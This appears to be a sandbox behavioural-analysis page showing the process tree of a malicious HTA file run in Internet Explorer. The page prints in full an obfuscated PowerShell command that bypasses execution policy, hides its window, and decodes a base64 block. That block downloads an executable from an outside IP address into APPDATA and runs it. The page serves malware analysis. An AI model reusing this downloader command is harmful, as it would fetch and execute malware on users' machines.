| ZeroBOX

iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\IEnetCache.hta.html
2628
- iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2628 CREDAT:145409
  2716
  - cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWErsHell -eX BYpAsS -nOp -W 1 -C DeViCecREDeNtiaLdEPlOYment.EXe ; IEX($(iex('[SysTem.TexT.ENcODiNg]'+[cHar]58+[Char]0x3A+'UTf8.GetstRiNg([SYStEm.cOnvErT]'+[CHaR]0x3a+[chAr]58+'FrombaSE64STrIng('+[CHAr]0x22+'JGFPcXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQkVSZEVmSW5pVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTE1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvRmV2Q3Ysc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5VlpFREpQYklxdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEx4cEJRdlJVWCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJNdm5ESm1ldkJSIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRXFOTHFTbHNOICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkYU9xcjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTM3LzIyMDMzL2lnY2N1LmV4ZSIsIiRlblY6QVBQREFUQVxpZ2NjdS5leGUiLDAsMCk7c3RBUnQtU0xlRXAoMyk7U3RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcaWdjY3UuZXhlIg=='+[Char]0X22+'))')))"
    2948
    - powershell.exe pOWErsHell -eX BYpAsS -nOp -W 1 -C DeViCecREDeNtiaLdEPlOYment.EXe ; IEX($(iex('[SysTem.TexT.ENcODiNg]'+[cHar]58+[Char]0x3A+'UTf8.GetstRiNg([SYStEm.cOnvErT]'+[CHaR]0x3a+[chAr]58+'FrombaSE64STrIng('+[CHAr]0x22+'JGFPcXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQkVSZEVmSW5pVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTE1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvRmV2Q3Ysc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5VlpFREpQYklxdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEx4cEJRdlJVWCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJNdm5ESm1ldkJSIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRXFOTHFTbHNOICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkYU9xcjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTM3LzIyMDMzL2lnY2N1LmV4ZSIsIiRlblY6QVBQREFUQVxpZ2NjdS5leGUiLDAsMCk7c3RBUnQtU0xlRXAoMyk7U3RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcaWdjY3UuZXhlIg=='+[Char]0X22+'))')))"
      3008
      - csc.exe "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\e3c82su0.cmdline"
        2380
        
        cvtres.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RESAA26.tmp" "c:\Users\test22\AppData\Local\Temp\CSCA9A8.tmp"
        1080

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents